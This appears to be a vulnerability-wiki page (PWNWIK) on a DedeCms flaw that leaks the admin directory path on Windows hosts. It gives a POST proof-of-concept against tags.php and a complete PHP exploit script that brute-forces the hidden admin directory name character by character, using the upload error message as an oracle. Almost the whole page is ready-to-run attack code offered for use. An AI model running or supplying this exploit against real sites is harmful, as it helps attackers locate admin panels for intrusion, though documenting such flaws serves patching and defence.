Loading
0

DedeCms后台地址泄露漏洞/ko

PWNWIK.COM

,

전제 조건

Windows 시스템 만

POC

http://localhost/dedecms/tags.php

post:

dopost=save&_FILESb4dboytmp_name=./de</images/admin_top_logo.gif&_FILESb4dboyname=0&_FILESb4dboysize=0&_FILESb4dboytype=image/gif

EXP

<?php
$domain='http://localhost/dedecms/';
$url=$domain.'/index.php';
function post($url, $data, $cookie = '') {
    $options = array(
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HEADER => true,
        CURLOPT_POST => true,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_COOKIE => $cookie,
        CURLOPT_POSTFIELDS => $data,
    );
    $ch = curl_init($url);
    curl_setopt_array($ch, $options);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
$testlen=25;
$str=range('a','z');
$number=range(0,9,1);
$dic = array_merge($str, $number);
$n=true;
$nn=true;
$path='';
while($n){
    foreach($dic as $v){
        foreach($dic as $vv){
            #echo $v.$vv .'----';
            $post_data="dopost=save&_FILESb4dboytmp_name=./$v$vv</images/admin_top_logo.gif&_FILESb4dboyname=0&_FILESb4dboysize=0&_FILESb4dboytype=image/gif";
            $result=post($url,$post_data);
            if(strpos($result,'Upload filetype not allow !') === false){
                $path=$v.$vv;$n=false;break 2;
            }
        }
    }
}
while($nn){
    foreach($dic as $vvv){
        $post_data="dopost=save&_FILESb4dboytmp_name=./$path$vvv</images/admin_top_logo.gif&_FILESb4dboyname=0&_FILESb4dboysize=0&_FILESb4dboytype=image/gif";
        $result=post($url,$post_data);
        if(strpos($result,'Upload filetype not allow !') === false){
            $path.=$vvv;
            echo $path . PHP_EOL;
            $giturl=$domain.'/'.$path.'/images/admin_top_logo.gif';
            if(@file_get_contents($giturl)){
                echo $domain.'/'.$path.'/';
                $nn=false;break 2;
            }
        }
    }
}
?>

免费、自由、人人可编辑的漏洞库